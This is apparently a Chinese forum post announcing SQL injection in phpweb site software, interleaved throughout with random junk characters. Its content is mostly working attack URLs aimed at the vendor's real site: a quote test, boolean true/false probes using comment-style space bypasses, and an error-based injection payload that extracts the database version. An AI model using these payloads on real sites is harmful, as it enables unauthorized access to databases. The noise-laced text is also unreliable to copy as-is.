phpweb所有的整站程序伪静态页面都存在sql注入
a+ l5 V, ~! f: [* c& F
3 s+ w! w* L+ N1 X主站:http://phpweb.net/
) T1 O" ~( r; t6 k: q+ J( M; }# H加’检测: X+ V! f- U5 A& D2 {6 u
# w3 l4 e7 i. ?. I. ahttp://www.phpweb.net/down/html/?772′.html
! f2 D* e2 _4 E3 A9 J1 J7 D" d- ^
[0 e0 w$ C; J出错 H# P* x5 C( {7 T) Z/ G3 J
存在注入。
( ?+ D4 I# c3 M; R( ^! t不能用空格,只能用/*罗
/ s7 s9 Y+ R+ m' [, M4 Phttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常1 W d+ V9 r# Q6 U1 d% o4 G. k
+ n3 G5 t/ L+ e" o
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
) F/ ?! [- D: ~5 s/ |8 ]- T+ f爆数据库版本:
9 O, g m5 m4 z+ g$ S9 w
! K* c- _7 d% M/ e I* K& c. S0 Q/ {1 t?
9 F5 |2 @3 q8 B3 B6 F9 }1& N' M# m7 I8 d+ r( C& u* V- e
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html6 K. h7 O; s# D9 D: Z
更新日期: 2013-01-03 13:39:50 % c7 Y2 d9 h4 F+ u3 M
|
发表于 2013-1-4 19:46:42
收藏
支持
反对